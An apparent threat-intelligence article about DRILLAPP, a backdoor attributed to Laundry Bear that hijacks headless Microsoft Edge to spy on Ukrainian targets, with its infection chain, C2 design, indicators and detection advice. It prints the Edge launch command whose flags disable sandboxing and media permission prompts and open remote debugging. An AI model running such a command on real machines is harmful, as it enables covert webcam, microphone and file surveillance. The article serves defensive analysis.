DRILLAPP: How Russia-Linked Hackers Turned Microsoft Edge Into a Surveillance Tool

A newly identified backdoor called DRILLAPP turns Microsoft Edge into a covert surveillance platform, silently capturing webcam footage, microphone audio, and screen recordings from infected machines — no suspicious executable required. Researchers have linked the campaign, observed throughout February 2026, to the Russia-aligned threat actor known as Laundry Bear.

In February 2026, analysts at LAB52 — the threat intelligence division of Spanish security firm S2 Grupo — published findings on a campaign targeting Ukrainian organizations that had gone largely undetected. The operation delivered a JavaScript-based backdoor they named DRILLAPP, and it did something novel: rather than deploying a traditional malicious binary, it hijacked Microsoft Edge itself, running the browser in headless mode with debugging parameters that strip away its safety constraints entirely. What emerged was a surveillance implant camouflaged inside one of the world's most commonly installed applications.

The discovery adds a new chapter to an already alarming story — a Russian-linked group that has spent over a year refining its approach to targeting Ukrainian defense personnel, government bodies, and civil society organizations through social engineering and custom malware.

The Threat Actor Behind DRILLAPP

DRILLAPP is attributed with low confidence to a threat group tracked under several names: Laundry Bear, UAC-0190, and Void Blizzard. The group is assessed to operate in support of Russian government interests and has been active since at least April 2024, according to Recorded Future's The Record. Its targets span government, defense, transportation, media, NGOs, and healthcare sectors across Europe and North America, with a particular focus on Ukraine.

The attribution to Laundry Bear is based on tactical overlaps with a campaign documented by Ukraine's Computer Emergency Response Team (CERT-UA) in January 2026. That operation, designated CERT-UA#19092, targeted members of the Ukrainian Armed Forces between October and December 2025 using a different malware family known as PLUGGYAPE. The connection between PLUGGYAPE and DRILLAPP is not a shared codebase — it is a shared playbook.

"Certain tactics shared with a Laundry Bear campaign reported by CERT-UA in January have been observed, resulting in the activity being attributed to this group with low confidence. These include the use of charity-themed lures or the hosting of operational artifacts on public text-sharing services." — LAB52, S2 Grupo (March 13, 2026)

The PLUGGYAPE campaign itself was notable. CERT-UA reported that attackers contacted Ukrainian servicemembers through Signal and WhatsApp, spoke Ukrainian, used Ukrainian phone numbers, and demonstrated detailed knowledge of their targets' organizations. Victims were directed to spoofed charity websites — some impersonating the Come Back Alive Foundation, a well-known Ukrainian humanitarian group — and prompted to download files disguised as documents. Those files were Python-based executables packaged with PyInstaller, ultimately installing the PLUGGYAPE backdoor, which communicated over WebSocket or MQTT.

The same charity lures, the same reliance on legitimate paste services for hosting payloads, and the same targeting profile now appear in the DRILLAPP campaign. The confidence in attribution is low, but the pattern is consistent enough that LAB52 treats them as likely the same actor.

How DRILLAPP Gets In: The Infection Chain

LAB52 identified two variants of the DRILLAPP campaign, separated by roughly three weeks and differentiated primarily by their initial delivery mechanism. Both share the same core execution logic and the same ultimate goal: establishing a persistent browser-based surveillance session on the victim's device.

First Variant: LNK Files and Starlink Lures

The first variant, identified in early February 2026, begins with a Windows shortcut file — a .lnk file — that executes a command creating an HTML Application (.hta) in the system's temporary folder. Simultaneously, the LNK file copies itself to the Windows Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup), establishing persistence so that the backdoor relaunches automatically after every reboot.

The victim is then shown a decoy webpage designed to look plausible. LAB52 observed two lure themes: imagery related to Starlink satellite internet installation — a technology critical to Ukrainian military communications — and content impersonating the Come Back Alive Foundation, a legitimate Ukrainian charity established in 2014 to support the Armed Forces. Both lures are carefully chosen to match the interests and daily concerns of Ukrainian defense and government personnel.

While the victim looks at the decoy content, the HTA file triggers Edge to open in headless mode — a state where the browser runs invisibly in the background with no visible window. The browser loads a remote JavaScript payload fetched from pastefy.app, a legitimate text-sharing service. The script is obfuscated using the open-source tool javascript-obfuscator, complicating static analysis.

Inside the Backdoor: Capabilities and C2 Architecture

Once the obfuscated payload loads inside the headless Edge instance, DRILLAPP functions as a lightweight but capable espionage tool. Through browser-native APIs — the same interfaces used by legitimate video conferencing and web applications — it gains access to the microphone for audio capture, the camera for video and still image capture, and the screen for screenshot or screen-recording collection. Files on the local file system are also accessible and transferable.

On first execution, the malware generates a unique device fingerprint. It does this using canvas fingerprinting — a technique originally developed for web analytics that renders a hidden HTML canvas element and reads back hardware-specific pixel rendering differences — combined with additional data points including screen resolution and system language. These values are hashed together and stored in the browser's persistent local storage under the key stream_client_id. This fingerprint identifies the victim machine across sessions without requiring a traditional cookie.

The malware then determines the victim's country by reading the system time zone. The code explicitly checks against a list of fifteen countries: the United Kingdom, Russia, Germany, France, China, Japan, the United States, Brazil, India, Ukraine, Canada, Australia, Italy, Spain, and Poland. If the time zone does not match any of those entries, the malware defaults to reporting the United States as the victim's location. This list reflects the geopolitical scope of Laundry Bear's intelligence interest — a set of NATO allies, adversary states, and Ukraine itself.

Command-and-control communications happen over WebSocket, a protocol used throughout legitimate web applications for real-time data exchange. This makes DRILLAPP traffic difficult to distinguish from normal browser activity on a network monitor. The WebSocket URL itself is not hardcoded into the payload; instead, the malware fetches it from a URL hosted on Pastefy — using the paste service as a dead drop resolver. If that URL is unavailable, the code falls back to localhost:8000, which LAB52 interprets as a debugging artifact left in place from the development phase.

"The browser is advantageous for this type of activity because it is a common and generally non-suspicious process, it offers extended capabilities accessible through debugging parameters that enable unsafe actions such as downloading remote files, and it provides legitimate access to sensitive resources such as the microphone, camera, or screen recording without triggering immediate alerts." — LAB52, S2 Grupo (March 13, 2026)

The Second Variant: Upgraded and Harder to Catch

A second version of DRILLAPP appeared in late February 2026. The initial delivery mechanism changed — LNK files were replaced by CPL files, which are Windows Control Panel modules that function internally as executable DLL libraries. CPL files are less commonly associated with malware delivery than LNK files, and their execution through the Windows Control Panel host process (control.exe) may evade endpoint rules tuned to catch shortcut-based loaders.

The decoy lures shifted as well. Where the first variant used Starlink imagery and charity content, the second variant displayed what appeared to be a weapons seizure report and an official-looking audit document from the Southern Office of the State Audit Service of Ukraine in the Mykolaiv region — loaded directly from the National Guard of Ukraine's official website. The sophistication of these lures suggests either reconnaissance of specific targets or a deliberate pivot toward government and audit personnel.

The backdoor payload itself received meaningful upgrades in this variant. Three new capabilities were added: recursive file listing (the ability to enumerate directory trees), batch file uploading (exfiltrating multiple files in a single operation), and arbitrary file downloading from the internet to the victim's device. That last capability required a workaround, because standard JavaScript — even running inside a browser — does not permit remote file downloads for security reasons.

To get around this, the operators used the Chrome DevTools Protocol (CDP). CDP is a low-level debugging interface built into all Chromium-based browsers, including Edge. It is normally used by developers to inspect pages, debug JavaScript, and automate browser behavior during testing. It becomes accessible when the browser is launched with the --remote-debugging-port parameter — which DRILLAPP's launch command includes. Through CDP on port 9222, the malware can inject small scripts into the browser, modify the default download directory, and simulate a user click that triggers a file download from a remote server. The entire sequence bypasses the browser's standard security sandbox restrictions.

msedge.exe --headless --no-sandbox --disable-web-security \
  --allow-file-access-from-files \
  --use-fake-ui-for-media-stream \
  --auto-select-screen-capture-source=true \
  --disable-user-media-security \
  --remote-debugging-port=9222

Why the Browser-as-Malware Approach Matters

DRILLAPP's browser-native execution model is not the first instance of malware abusing browser debugging capabilities, but it is among the clearest demonstrations of how completely a standard desktop browser can be transformed into a surveillance implant when its security parameters are disabled. The key insight the operators exploited is that endpoint detection tools are typically tuned to flag suspicious executables, unusual process behavior, or known malware signatures — not a browser process reading from a webcam.

An early proof-of-concept sample uploaded from Russia on January 28, 2026, offers a window into the development timeline. That sample ran the same infection chain but made no attempt to download a payload; instead, it contacted the benign website gnome.com. LAB52 assessed this as testing infrastructure connectivity before the actual campaign began — a standard practice in structured threat actor operations.

The use of Pastefy as a dead drop resolver further insulates the operation. Because Pastefy is a legitimate service, network-level blocks on the C2 WebSocket URL do not eliminate the attacker's ability to update the endpoint — they simply update the paste, and all infected machines retrieve the new address automatically. This architecture also means that even if a sample is analyzed in isolation, the actual C2 server address may not be visible at the time of analysis if the paste has been deleted or changed.

LAB52 researchers were candid about the current state of the tool: DRILLAPP is assessed to be in early development. The localhost:8000 fallback, the lack of full obfuscation in some areas of the code, and the relatively limited command set compared to mature implants all suggest an operator that is building and refining this capability in near-real time while actively deploying it against live targets.

"The analysis conducted indicates that DRILLAPP is a recent artifact that is still in an early stage of development. One of the most notable aspects is the use of the browser to deploy a backdoor, which suggests that the attackers are exploring new ways to evade detection." — LAB52, S2 Grupo (March 13, 2026)

That developmental trajectory is precisely what makes this campaign worth watching. A tool that already delivers camera access, microphone recording, screen capture, and file exfiltration — while hiding inside a trusted process — has significant room to grow before it approaches the ceiling of what browser-native execution can accomplish. Future variants could add keylogging via browser-accessible input events, credential harvesting from browser-stored passwords, or additional C2 channels using browser-native APIs like WebRTC.

Indicators of Compromise

LAB52 published a full set of indicators with their March 13, 2026 report. Key network indicators include two IP addresses (80.89.224[.]13 and 188.137.228[.]162) and several Pastefy URLs used as payload hosts and dead drop resolvers. File-based indicators include SHA-256 hashes for both the first and second variant samples, as well as the DRILLAPP JavaScript payload itself. Organizations should ingest these indicators into their SIEM and threat intelligence platforms and search retrospectively for any matches in Edge process launch logs.

Defensive controls recommended by security researchers include monitoring for Edge or Chrome launched with --remote-debugging-port in the command line, alerting on browsers executing with --disable-web-security or --no-sandbox, and restricting LNK and CPL file execution through Group Policy or endpoint protection rules. The CIS Microsoft Edge Benchmark provides a baseline for restricting developer tools and remote debugging in managed environments.

Key Takeaways

1. The browser is the new loader: DRILLAPP demonstrates that a fully functional espionage implant can run entirely within a legitimate browser process, accessing the webcam, microphone, screen, and file system without deploying a standalone malicious executable. Endpoint detection that focuses only on binary execution will miss this class of threat.
2. Laundry Bear is iterating rapidly: Two distinct DRILLAPP variants appeared within approximately three weeks, each with expanded capabilities and a changed delivery mechanism. The group's January 2026 PLUGGYAPE campaign showed the same pattern of fast iteration. Organizations targeting Ukraine or allied with it should treat this actor as operationally active and evolving.
3. Legitimate services as infrastructure: Pastefy, a benign text-sharing platform, hosts both the JavaScript payload and the C2 endpoint resolver. This pattern — abusing trusted third-party services to evade network-layer detection — is a hallmark of modern state-aligned espionage operations and is unlikely to change.
4. Social engineering remains the entry point: Charity lures, government document impersonation, and Starlink-themed content are all carefully chosen to match the concerns of Ukrainian defense and government personnel. No technical control substitutes for user awareness of these specific lure categories in the current threat environment.
5. Attribution carries uncertainty: LAB52 assigns low confidence to the Laundry Bear attribution. The tactical overlaps are real, but they could reflect deliberate mimicry or shared tooling across groups. Defenders should treat the behavioral indicators — browser-based execution, Pastefy hosting, charity-themed lures — as detection priorities regardless of who is ultimately behind the keyboard.

DRILLAPP signals a broader shift in how sophisticated threat actors think about implant design. Browsers are everywhere, their processes are trusted, and their capabilities — when debugging constraints are removed — rival those of purpose-built malware. The Ukraine conflict has long served as a testing ground for Russian cyber operations before those techniques migrate to other theaters. Security teams protecting organizations outside Ukraine should study DRILLAPP now, not after the next variant appears on their network.

Sources: LAB52 / S2 Grupo — Primary Research Report (March 13, 2026) · The Hacker News (March 16, 2026) · Security Affairs (March 16, 2026) · The Record / Recorded Future (January 13, 2026) · CERT-UA Alert #19092 (January 2026)